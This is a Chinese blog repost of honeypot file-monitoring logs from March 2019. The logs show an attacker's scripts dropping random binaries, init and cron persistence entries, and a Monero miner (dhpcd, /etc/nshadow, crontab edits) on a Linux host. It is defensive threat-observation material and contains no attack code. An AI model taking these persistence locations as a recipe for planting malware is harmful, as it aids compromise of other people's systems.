当前位置：网站首页 > 网络安全培训 > 正文

蜜罐捕捉的日志脚本整理

freebuf 2019-03-23 240 0

本文来源:

捕捉到的东西

https://github.com/yingshang/Legacy-of-intrusion.git

2019-3-19号

黑客上传了几个脚本，里面有一个不断生成和并不断执行，直接你的硬盘和内存爆破，我的蜜罐直接被卡死

Line 13703: INFO:root:CREATE event : /dev/shm/BIdsqkKc  2019-03-19 11:33:33.934697 	Line 13862: INFO:root:CREATE event : /dev/shm/BIdsqkKc  2019-03-19 11:33:41.071763 	Line 14425: INFO:root:CREATE event : /dev/shm/B00M  2019-03-19 11:34:07.028623 	Line 14569: INFO:root:CREATE event : /dev/shm/TfkajmkIH  2019-03-19 11:34:13.624843 	Line 14709: INFO:root:CREATE event : /dev/shm/TfkajmkIH  2019-03-19 11:34:20.874330 	Line 15226: INFO:root:CREATE event : /dev/shm/B00M  2019-03-19 11:34:44.845148 	Line 15710: INFO:root:CREATE event : /root/mi3307  2019-03-19 11:47:38.111477 	Line 15918: INFO:root:CREATE event : /lib/libudev.so  2019-03-19 11:47:38.640116 	Line 16228: INFO:root:CREATE event : /usr/bin/mljdjbqxuq  2019-03-19 11:47:39.317262 	Line 16561: INFO:root:CREATE event : /etc/init.d/mljdjbqxuq  2019-03-19 11:47:39.754944 	Line 16575: INFO:root:CREATE event : /etc/cron.hourly/gcc.sh  2019-03-19 11:47:39.757342 	Line 16588: INFO:root:CREATE event : /etc/rc1.d/S90mljdjbqxuq  2019-03-19 11:47:39.760102 	Line 16591: INFO:root:CREATE event : /etc/rc2.d/S90mljdjbqxuq  2019-03-19 11:47:39.760918 	Line 16593: INFO:root:CREATE event : /etc/rc3.d/S90mljdjbqxuq  2019-03-19 11:47:39.761409 	Line 16595: INFO:root:CREATE event : /etc/rc4.d/S90mljdjbqxuq  2019-03-19 11:47:39.761975 	Line 16607: INFO:root:CREATE event : /etc/rc5.d/S90mljdjbqxuq  2019-03-19 11:47:39.763688 	Line 16703: INFO:root:CREATE event : /etc/sedTeXeUr  2019-03-19 11:47:39.786380 	Line 16713: INFO:root:CREATE event : /usr/bin/itwgznmnoq  2019-03-19 11:47:39.790291 	Line 17029: INFO:root:CREATE event : /run/gcc.pid  2019-03-19 11:47:39.880049 	Line 17699: INFO:root:CREATE event : /usr/bin/hdgxvqdrsm  2019-03-19 11:47:43.803555 	Line 18623: INFO:root:CREATE event : /usr/bin/tfyczjenzc  2019-03-19 11:47:48.795079 	Line 19734: INFO:root:CREATE event : /usr/bin/tcbajoqxih  2019-03-19 11:47:53.814405 	Line 20911: INFO:root:CREATE event : /usr/bin/qwqtwyndll  2019-03-19 11:47:58.862042 	Line 21996: INFO:root:CREATE event : /usr/bin/wlrxmjobio  2019-03-19 11:48:03.851830 	Line 23074: INFO:root:CREATE event : /usr/bin/rghrsafgrk  2019-03-19 11:48:08.877788 	Line 24066: INFO:root:CREATE event : /usr/bin/zgozhbbcyy  2019-03-19 11:48:13.910422 	Line 25160: INFO:root:CREATE event : /usr/bin/wvrtivxvlm  2019-03-19 11:48:18.932093 	Line 26254: INFO:root:CREATE event : /usr/bin/tepjqlylch  2019-03-19 11:48:23.973665 	Line 27355: INFO:root:CREATE event : /usr/bin/dpcuygdzwd  2019-03-19 11:48:29.063822 	Line 28441: INFO:root:CREATE event : /usr/bin/efuaffgsgs  2019-03-19 11:48:34.089048 	Line 29538: INFO:root:CREATE event : /usr/bin/gsfulgfjzd  2019-03-19 11:48:39.112690 	Line 30656: INFO:root:CREATE event : /usr/bin/tjminyopuf  2019-03-19 11:48:44.134765 	Line 31741: INFO:root:CREATE event : /usr/bin/qjyogmvqxv  2019-03-19 11:48:49.154488 	Line 32854: INFO:root:CREATE event : /usr/bin/avjvmbemyu  2019-03-19 11:48:54.203118 	Line 33878: INFO:root:CREATE event : /usr/bin/ibuidgnelw  2019-03-19 11:48:59.229367 	Line 34992: INFO:root:CREATE event : /usr/bin/iksgdzxmrr  2019-03-19 11:49:04.248427 	Line 36078: INFO:root:CREATE event : /usr/bin/dqhhhcfdrs  2019-03-19 11:49:09.282517 	Line 37195: INFO:root:CREATE event : /usr/bin/liryxanysl  2019-03-19 11:49:14.320403 	Line 38311: INFO:root:CREATE event : /usr/bin/ikvrwrtbar  2019-03-19 11:49:19.386290 	Line 39421: INFO:root:CREATE event : /usr/bin/wgbhpgkhva  2019-03-19 11:49:24.415379 	Line 40532: INFO:root:CREATE event : /usr/bin/ilwcdmjaxx  2019-03-19 11:49:29.484670 	Line 41613: INFO:root:CREATE event : /usr/bin/jzahqxwfix  2019-03-19 11:49:34.510543 	Line 42714: INFO:root:CREATE event : /usr/bin/hkjidwudsj  2019-03-19 11:49:39.584346 	Line 43802: INFO:root:CREATE event : /usr/bin/ettnlpziav  2019-03-19 11:49:44.645891 	Line 44898: INFO:root:CREATE event : /usr/bin/xzjrzdjjso  2019-03-19 11:49:49.646176 	Line 45996: INFO:root:CREATE event : /usr/bin/mrhxtxvoge  2019-03-19 11:49:54.707326 	Line 47069: INFO:root:CREATE event : /usr/bin/djohznghsk  2019-03-19 11:49:59.798660 	Line 48193: INFO:root:CREATE event : /usr/bin/caqliaehly  2019-03-19 11:50:04.833356 	Line 49296: INFO:root:CREATE event : /usr/bin/vrkxxcxzuj  2019-03-19 11:50:09.852183 	Line 50376: INFO:root:CREATE event : /usr/bin/joqhtqzygl  2019-03-19 11:50:14.892930 	Line 51465: INFO:root:CREATE event : /usr/bin/mvrmlzpfkr  2019-03-19 11:50:19.921282 	Line 52584: INFO:root:CREATE event : /usr/bin/xecszwdprk  2019-03-19 11:50:24.963665 	Line 53680: INFO:root:CREATE event : /usr/bin/eaenxzzblz  2019-03-19 11:50:29.990015 	Line 54500: INFO:root:CREATE event : /usr/bin/uuxflgtgay  2019-03-19 11:50:35.016746 	Line 55613: INFO:root:CREATE event : /usr/bin/sowaxanykz  2019-03-19 11:50:40.045852 	Line 56700: INFO:root:CREATE event : /usr/bin/rngverfygu  2019-03-19 11:50:45.069087 	Line 57797: INFO:root:CREATE event : /usr/bin/kelvnqcwgr  2019-03-19 11:50:50.112345 	Line 58917: INFO:root:CREATE event : /usr/bin/pjkfnqrxjl  2019-03-19 11:50:55.136699 	Line 60016: INFO:root:CREATE event : /usr/bin/wqzbdjdqfn  2019-03-19 11:51:00.188586 	Line 61128: INFO:root:CREATE event : /usr/bin/hpkdvojjxw  2019-03-19 11:51:05.210515 	Line 62249: INFO:root:CREATE event : /usr/bin/rhtoxzhlms  2019-03-19 11:51:10.234045 	Line 63354: INFO:root:CREATE event : /usr/bin/oqvwdfxeaw  2019-03-19 11:51:15.274103 	Line 64491: INFO:root:CREATE event : /usr/bin/cclojjaive  2019-03-19 11:51:20.317813 	Line 65593: INFO:root:CREATE event : /usr/bin/vqqpaelesh  2019-03-19 11:51:25.350728 	Line 66687: INFO:root:CREATE event : /usr/bin/rigapuhpdn  2019-03-19 11:51:30.383180 	Line 67822: INFO:root:CREATE event : /usr/bin/voqjewxuqu  2019-03-19 11:51:35.447531 	Line 68886: INFO:root:CREATE event : /usr/bin/ztxkldmywg  2019-03-19 11:51:40.447447 	Line 69968: INFO:root:CREATE event : /usr/bin/zgkwshpmss  2019-03-19 11:51:45.582693 	Line 71079: INFO:root:CREATE event : /usr/bin/upcultngri  2019-03-19 11:51:50.608717 	Line 72158: INFO:root:CREATE event : /usr/bin/rojksksovb  2019-03-19 11:51:55.640087 	Line 73243: INFO:root:CREATE event : /usr/bin/lalzylwttz  2019-03-19 11:52:00.664435 	Line 74343: INFO:root:CREATE event : /usr/bin/pvoljuuvng  2019-03-19 11:52:05.703119 	Line 75451: INFO:root:CREATE event : /usr/bin/juwtljomtq  2019-03-19 11:52:10.771522 	Line 76571: INFO:root:CREATE event : /usr/bin/ejqcwhvylv  2019-03-19 11:52:15.904960 	Line 77682: INFO:root:CREATE event : /usr/bin/dwarotcwei  2019-03-19 11:52:20.946080 	Line 78784: INFO:root:CREATE event : /usr/bin/nwlhaspckz  2019-03-19 11:52:25.985090 	Line 79894: INFO:root:CREATE event : /usr/bin/zomshobpvz  2019-03-19 11:52:31.100967 	Line 80984: INFO:root:CREATE event : /usr/bin/cdjucqrwsr  2019-03-19 11:52:36.243796 	Line 82076: INFO:root:CREATE event : /usr/bin/pnjlomfubx  2019-03-19 11:52:41.262007 	Line 83157: INFO:root:CREATE event : /usr/bin/kmcmzgokzm  2019-03-19 11:52:46.301496 	Line 84255: INFO:root:CREATE event : /usr/bin/zghzlgmsyj  2019-03-19 11:52:51.323833 	Line 85379: INFO:root:CREATE event : /usr/bin/tjsnhqgoog  2019-03-19 11:52:56.381780 	Line 86438: INFO:root:CREATE event : /usr/bin/lbodntcnpi  2019-03-19 11:53:01.384079 	Line 87523: INFO:root:CREATE event : /usr/bin/sclkrpxyrl  2019-03-19 11:53:06.397228 	Line 88718: INFO:root:CREATE event : /usr/bin/qimqfzkzxz  2019-03-19 11:53:11.483370 	Line 89801: INFO:root:CREATE event : /usr/bin/yhpjlrzndo  2019-03-19 11:53:16.493737 	Line 90892: INFO:root:CREATE event : /usr/bin/ztmfopzspc  2019-03-19 11:53:21.625367 	Line 91991: INFO:root:CREATE event : /usr/bin/jaxashciyq  2019-03-19 11:53:26.649283 	Line 93080: INFO:root:CREATE event : /usr/bin/jbwynyusjm  2019-03-19 11:53:31.667976 	Line 94141: INFO:root:CREATE event : /usr/bin/hwsqtsempg  2019-03-19 11:53:36.780939 	Line 95238: INFO:root:CREATE event : /usr/bin/welovbhjft  2019-03-19 11:53:41.863879 	Line 96150: INFO:root:CREATE event : /usr/bin/wlzubzaieu  2019-03-19 11:53:46.885064 	Line 97258: INFO:root:CREATE event : /usr/bin/tlnktrgouv  2019-03-19 11:53:51.934835 	Line 98322: INFO:root:CREATE event : /usr/bin/niozmehmuy  2019-03-19 11:53:56.993401 	Line 99320: INFO:root:CREATE event : /usr/bin/yyxuxablqc  2019-03-19 11:54:02.223188 	Line 100385: INFO:root:CREATE event : /usr/bin/xioswewick  2019-03-19 11:54:07.243593 	Line 101468: INFO:root:CREATE event : /usr/bin/kdhrthmfyv  2019-03-19 11:54:12.264061 	Line 102492: INFO:root:CREATE event : /usr/bin/mgnuwfmtbn  2019-03-19 11:54:17.279359 	Line 103486: INFO:root:CREATE event : /usr/bin/yldlboumsy  2019-03-19 11:54:22.297750 	Line 104678: INFO:root:CREATE event : /usr/bin/ywetrirkxi  2019-03-19 11:54:27.316287 	Line 105804: INFO:root:CREATE event : /usr/bin/jepqzfnftn  2019-03-19 11:54:32.333110 	Line 106890: INFO:root:CREATE event : /usr/bin/imqafwkjdw  2019-03-19 11:54:37.355253 	Line 108015: INFO:root:CREATE event : /usr/bin/qvygfqisbs  2019-03-19 11:54:42.370762 	Line 109151: INFO:root:CREATE event : /usr/bin/upvljogxuc  2019-03-19 11:54:47.392550 	Line 110244: INFO:root:CREATE event : /usr/bin/ydxqyonnnp  2019-03-19 11:54:52.409708 	Line 111367: INFO:root:CREATE event : /usr/bin/hgziqmhpst  2019-03-19 11:54:57.433024 	Line 112485: INFO:root:CREATE event : /usr/bin/qbdblchcdr  2019-03-19 11:55:02.453102 	Line 113608: INFO:root:CREATE event : /usr/bin/sywscbdtxw  2019-03-19 11:55:07.471159 	Line 114658: INFO:root:CREATE event : /usr/bin/hnykoobvyi  2019-03-19 11:55:12.489864 	Line 115778: INFO:root:CREATE event : /usr/bin/ntbewdfawr  2019-03-19 11:55:17.507733 	Line 116901: INFO:root:CREATE event : /usr/bin/cjiptqfzyn  2019-03-19 11:55:22.523887 	Line 118005: INFO:root:CREATE event : /usr/bin/kmkxseewmj  2019-03-19 11:55:27.544122 	Line 119119: INFO:root:CREATE event : /usr/bin/udvkhawyzw  2019-03-19 11:55:32.564481 	Line 120225: INFO:root:CREATE event : /usr/bin/iallspknhm  2019-03-19 11:55:37.584333 	Line 121445: INFO:root:CREATE event : /usr/bin/jinxrssxzc  2019-03-19 11:55:42.602588 	Line 122570: INFO:root:CREATE event : /usr/bin/refospazwn  2019-03-19 11:55:47.624460 	Line 123661: INFO:root:CREATE event : /usr/bin/ocnwsicxys  2019-03-19 11:55:52.640890 	Line 124893: INFO:root:CREATE event : /usr/bin/nhmsuqhjdp  2019-03-19 11:55:57.659310 	Line 125984: INFO:root:CREATE event : /usr/bin/gzaywdyqhr  2019-03-19 11:56:02.677282 	Line 127093: INFO:root:CREATE event : /usr/bin/izgnqjwzbe  2019-03-19 11:56:07.696340 	Line 128215: INFO:root:CREATE event : /usr/bin/yipnblnksp  2019-03-19 11:56:12.716089 	Line 129335: INFO:root:CREATE event : /usr/bin/fowgrzbpoo  2019-03-19 11:56:17.737022 	Line 130466: INFO:root:CREATE event : /usr/bin/hbwrucsaye  2019-03-19 11:56:22.755358 	Line 131555: INFO:root:CREATE event : /usr/bin/echktugnfh  2019-03-19 11:56:27.772768 	Line 132601: INFO:root:CREATE event : /usr/bin/rqhxnpgivg  2019-03-19 11:56:32.791967 	Line 133712: INFO:root:CREATE event : /usr/bin/ukxikaonip  2019-03-19 11:56:37.811970 	Line 134820: INFO:root:CREATE event : /usr/bin/axjjvapppz  2019-03-19 11:56:42.832591 	Line 135932: INFO:root:CREATE event : /usr/bin/mjcjwqedqv  2019-03-19 11:56:47.853416 	Line 137041: INFO:root:CREATE event : /usr/bin/fephwodrjv  2019-03-19 11:56:52.874117 	Line 138012: INFO:root:CREATE event : /usr/bin/tzlzjmxlfi  2019-03-19 11:56:57.893816 	Line 139117: INFO:root:CREATE event : /usr/bin/bzqptzkwfv  2019-03-19 11:57:02.910851 	Line 140205: INFO:root:CREATE event : /usr/bin/kplhzzybnr  2019-03-19 11:57:07.932082 	Line 141302: INFO:root:CREATE event : /usr/bin/dmuworqhap  2019-03-19 11:57:12.948061 	Line 142406: INFO:root:CREATE event : /usr/bin/wmazvhgoyq  2019-03-19 11:57:17.971944 	Line 143463: INFO:root:CREATE event : /usr/bin/zlvobfyvuo  2019-03-19 11:57:22.993139 	Line 144571: INFO:root:CREATE event : /usr/bin/xteuvtqgou  2019-03-19 11:57:28.009971 	Line 145678: INFO:root:CREATE event : /usr/bin/kigyaggzht  2019-03-19 11:57:33.032718 	Line 146787: INFO:root:CREATE event : /usr/bin/raeykerfvg  2019-03-19 11:57:38.051081 	Line 147888: INFO:root:CREATE event : /usr/bin/darjqjewfh  2019-03-19 11:57:43.074353 	Line 148972: INFO:root:CREATE event : /usr/bin/wxbnxxydvo  2019-03-19 11:57:48.096870 	Line 150079: INFO:root:CREATE event : /usr/bin/obcqcdsxuc  2019-03-19 11:57:53.137767 	Line 151192: INFO:root:CREATE event : /usr/bin/jveuwxenps  2019-03-19 11:57:58.132597 	Line 152050: INFO:root:CREATE event : /usr/bin/ettyutiier  2019-03-19 11:58:03.151999 	Line 153163: INFO:root:CREATE event : /usr/bin/tjjjjwicxu  2019-03-19 11:58:08.169554 	Line 154358: INFO:root:CREATE event : /usr/bin/hsehzxokyd  2019-03-19 11:58:13.187791 	Line 155218: INFO:root:CREATE event : /usr/bin/foctkvooxa  2019-03-19 11:58:18.237427 	Line 156336: INFO:root:CREATE event : /usr/bin/hmlwlqheph  2019-03-19 11:58:25.144106 	Line 157509: INFO:root:CREATE event : /usr/bin/wdxsweahga  2019-03-19 11:58:30.159639 	Line 158607: INFO:root:CREATE event : /usr/bin/zbzewvinhq  2019-03-19 11:58:35.197122 	Line 159541: INFO:root:CREATE event : /usr/bin/sagkohkajx  2019-03-19 11:58:40.247561 	Line 160672: INFO:root:CREATE event : /usr/bin/xjcsynmmvq  2019-03-19 11:58:45.239934 	Line 161875: INFO:root:CREATE event : /usr/bin/rcejcgrblq  2019-03-19 11:58:50.279780 	Line 162919: INFO:root:CREATE event : /usr/bin/rfdtscspik  2019-03-19 11:58:55.280718 	Line 163971: INFO:root:CREATE event : /usr/bin/aatumvjxpc  2019-03-19 11:59:00.299457 	Line 164953: INFO:root:CREATE event : /usr/bin/zxuqmzloir  2019-03-19 11:59:05.324995 	Line 166056: INFO:root:CREATE event : /usr/bin/nqgikjvtqg  2019-03-19 11:59:10.367343 	Line 167158: INFO:root:CREATE event : /usr/bin/fjptqhsgim  2019-03-19 11:59:15.357824 	Line 168290: INFO:root:CREATE event : /usr/bin/cqplewqfvz  2019-03-19 11:59:20.378778 	Line 169371: INFO:root:CREATE event : /usr/bin/wcrbyehplz  2019-03-19 11:59:25.395906 	Line 170487: INFO:root:CREATE event : /usr/bin/ajysxqmxuz  2019-03-19 11:59:30.415865 	Line 171510: INFO:root:CREATE event : /usr/bin/jwkeummbzr  2019-03-19 11:59:35.431802 	Line 172606: INFO:root:CREATE event : /usr/bin/nutapebskg  2019-03-19 11:59:40.455338 	Line 173785: INFO:root:CREATE event : /usr/bin/ysgktqqvty  2019-03-19 11:59:45.472435 	Line 174915: INFO:root:CREATE event : /usr/bin/kxerendyzp  2019-03-19 11:59:50.491086

2019-3-21号

门罗币挖矿

root@localhost:/record# cat monitor.log | grep CREATE INFO:root:CREATE event : /dev/pts/0  2019-03-20 02:08:54.558236 INFO:root:CREATE event : /usr/operation  2019-03-20 02:09:11.379264 INFO:root:CREATE event : /dev/pts/0  2019-03-20 04:09:38.896324 INFO:root:CREATE event : /root/.bash_history  2019-03-20 04:10:02.758810 INFO:root:CREATE event : /bin/ets9b876j46x1a589wmo4htdu7  2019-03-20 15:13:13.196724 INFO:root:CREATE event : /bin/dhpcd  2019-03-20 15:13:21.085534 INFO:root:CREATE event : /etc/nshadow  2019-03-20 15:13:53.019796 INFO:root:CREATE event : /root/.ssh  2019-03-20 15:14:13.246905 INFO:root:CREATE event : /dev/shm/ets9b876j46x1a589wmo4htdu7  2019-03-20 15:14:18.103935 INFO:root:CREATE event : /tmp/ets9b876j46x1a589wmo4htdu7  2019-03-20 15:14:28.352342 INFO:root:CREATE event : /tmp/knrm  2019-03-20 15:14:33.395370 INFO:root:CREATE event : /tmp/r  2019-03-20 15:14:37.392344 INFO:root:CREATE event : /tmp/tmp.efsTWF68ua  2019-03-20 15:14:40.254357 INFO:root:CREATE event : /etc/sedRnzDvp  2019-03-20 15:14:40.262898 INFO:root:CREATE event : /var/spool/cron/crontabs/tmp.wkldnB  2019-03-20 15:14:40.526935 INFO:root:CREATE event : /tmp/tmp.O5mRAvm7ST  2019-03-20 15:14:48.853449 INFO:root:CREATE event : /etc/sed1evIks  2019-03-20 15:14:48.857253 INFO:root:CREATE event : /var/spool/cron/crontabs/tmp.5gdVYA  2019-03-20 15:14:49.207956 INFO:root:CREATE event : /bin/dhpcd  2019-03-20 15:14:53.271247 root@localhost:/record# cat monitor.log | grep MODI INFO:root:MODIFY event : /run/utmp  2019-03-20 02:09:11.359695 INFO:root:MODIFY event : /dev/null  2019-03-20 02:09:11.395338 INFO:root:MODIFY event : /dev/pts/0  2019-03-20 02:09:11.406661 INFO:root:MODIFY event : /run/utmp  2019-03-20 02:09:11.495534 INFO:root:MODIFY event : /sys/fs/cgroup/hugetlb/cgroup.procs  2019-03-20 04:09:38.821148 INFO:root:MODIFY event : /sys/fs/cgroup/hugetlb/cgroup.procs  2019-03-20 04:09:38.822800 INFO:root:MODIFY event : /sys/fs/cgroup/systemd/cgroup.procs  2019-03-20 04:09:38.844848 INFO:root:MODIFY event : /sys/fs/cgroup/systemd/cgroup.procs  2019-03-20 04:09:38.854813 INFO:root:MODIFY event : /sys/fs/cgroup/net_cls,net_prio/cgroup.procs  2019-03-20 04:09:38.855580 INFO:root:MODIFY event : /sys/fs/cgroup/net_cls,net_prio/cgroup.procs  2019-03-20 04:09:38.856195 INFO:root:MODIFY event : /sys/fs/cgroup/net_cls,net_prio/cgroup.procs  2019-03-20 04:09:38.856689 INFO:root:MODIFY event : /sys/fs/cgroup/net_cls,net_prio/cgroup.procs  2019-03-20 04:09:38.859445 INFO:root:MODIFY event : /sys/fs/cgroup/pids/cgroup.procs  2019-03-20 04:09:38.860014 INFO:root:MODIFY event : /sys/fs/cgroup/pids/cgroup.procs  2019-03-20 04:09:38.860579 INFO:root:MODIFY event : /sys/fs/cgroup/cpu,cpuacct/cgroup.procs  2019-03-20 04:09:38.861078 INFO:root:MODIFY event : /sys/fs/cgroup/cpu,cpuacct/cgroup.procs  2019-03-20 04:09:38.861639 INFO:root:MODIFY event : /sys/fs/cgroup/freezer/cgroup.procs  2019-03-20 04:09:38.862137 INFO:root:MODIFY event : /sys/fs/cgroup/freezer/cgroup.procs  2019-03-20 04:09:38.867408 INFO:root:MODIFY event : /sys/fs/cgroup/cpuset/cgroup.procs  2019-03-20 04:09:38.868089 INFO:root:MODIFY event : /sys/fs/cgroup/cpuset/cgroup.procs  2019-03-20 04:09:38.868791 INFO:root:MODIFY event : /sys/fs/cgroup/devices/cgroup.procs  2019-03-20 04:09:38.869305 INFO:root:MODIFY event : /sys/fs/cgroup/devices/cgroup.procs  2019-03-20 04:09:38.869973 INFO:root:MODIFY event : /sys/fs/cgroup/memory/cgroup.procs  2019-03-20 04:09:38.870519 INFO:root:MODIFY event : /sys/fs/cgroup/memory/cgroup.procs  2019-03-20 04:09:38.875420 INFO:root:MODIFY event : /sys/fs/cgroup/perf_event/cgroup.procs  2019-03-20 04:09:38.875940 INFO:root:MODIFY event : /sys/fs/cgroup/perf_event/cgroup.procs  2019-03-20 04:09:38.876589 INFO:root:MODIFY event : /sys/fs/cgroup/blkio/cgroup.procs  2019-03-20 04:09:38.877095 INFO:root:MODIFY event : /sys/fs/cgroup/blkio/cgroup.procs  2019-03-20 04:09:38.877714 INFO:root:MODIFY event : /sys/fs/cgroup/cpu,cpuacct/cgroup.procs  2019-03-20 04:09:38.878251 INFO:root:MODIFY event : /sys/fs/cgroup/cpu,cpuacct/cgroup.procs  2019-03-20 04:09:38.878898 INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:39.164499 INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:40.176459 INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:40.313840 INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:40.414496 INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:40.541559 INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:41.018949 INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:41.167878 INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:41.480871 INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:42.132803 INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:42.371361 INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:42.558634 INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:42.773391 INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:43.287925 INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:43.377093 INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:43.590337 INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:43.840286 INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:43.927635 INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:44.055641 INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:45.080589 INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:45.256384 INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:45.456842 INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:46.861468 INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:47.374563 INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:47.538828 INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:47.651745 INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:47.721959 INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:48.868994 INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:49.019794 INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:49.081561 INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:49.094732 INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:51.515933 INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:51.640233 INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:51.688437 INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:51.689514 INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:53.395020 INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:53.596157 INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:53.823423 INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:54.049726 INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:54.210870 INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:54.412377 INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:54.512597 INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:54.662840 INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:54.686100 INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:54.686901 INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:54.687545 INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:59.027683 INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:59.152111 INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:59.252011 INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:59.390181 INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:59.566355 INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:59.640919 INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:59.917892 INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:10:00.105004 INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:10:01.348837 INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:10:01.673340 INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:10:01.861180 INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:10:02.062987 INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:10:02.740363 INFO:root:MODIFY event : /root/.bash_history  2019-03-20 04:10:02.763356 INFO:root:MODIFY event : /bin/ets9b876j46x1a589wmo4htdu7  2019-03-20 15:13:13.695989 INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:13:22.908247 INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:13:24.316824 INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:13:25.196549 INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:13:26.028442 INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:13:26.906511 INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:13:27.775044 INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:13:28.648578 INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:13:29.552310 INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:13:30.428356 INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:13:31.283118 INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:13:32.187718 INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:13:33.258305 INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:13:34.241886 INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:13:35.284409 INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:13:36.296268 INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:13:37.413299 INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:13:38.281973 INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:13:39.200778 INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:13:40.981730 INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:13:42.768890 INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:13:42.769996 INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:13:43.825358 INFO:root:MODIFY event : /etc/nshadow  2019-03-20 15:13:53.022030 INFO:root:MODIFY event : /dev/shm/ets9b876j46x1a589wmo4htdu7  2019-03-20 15:14:18.455523 INFO:root:MODIFY event : /tmp/ets9b876j46x1a589wmo4htdu7  2019-03-20 15:14:28.775480 INFO:root:MODIFY event : /tmp/knrm  2019-03-20 15:14:34.118183 INFO:root:MODIFY event : /tmp/knrm  2019-03-20 15:14:34.253943 INFO:root:MODIFY event : /tmp/knrm  2019-03-20 15:14:34.462640 INFO:root:MODIFY event : /tmp/knrm  2019-03-20 15:14:34.676316 INFO:root:MODIFY event : /tmp/knrm  2019-03-20 15:14:34.835138 INFO:root:MODIFY event : /tmp/knrm  2019-03-20 15:14:35.051863 INFO:root:MODIFY event : /tmp/knrm  2019-03-20 15:14:35.177190 INFO:root:MODIFY event : /tmp/r  2019-03-20 15:14:37.928084 INFO:root:MODIFY event : /etc/sedRnzDvp  2019-03-20 15:14:40.270026 INFO:root:MODIFY event : /var/spool/cron/crontabs/tmp.wkldnB  2019-03-20 15:14:40.528250 INFO:root:MODIFY event : /dev/null  2019-03-20 15:14:43.419044 INFO:root:MODIFY event : /etc/sed1evIks  2019-03-20 15:14:48.857973 INFO:root:MODIFY event : /var/spool/cron/crontabs/tmp.5gdVYA  2019-03-20 15:14:49.217717 INFO:root:MODIFY event : /dev/null  2019-03-20 15:14:50.245119 INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:53.816718 INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:53.972817 INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:54.138558 INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:54.303399 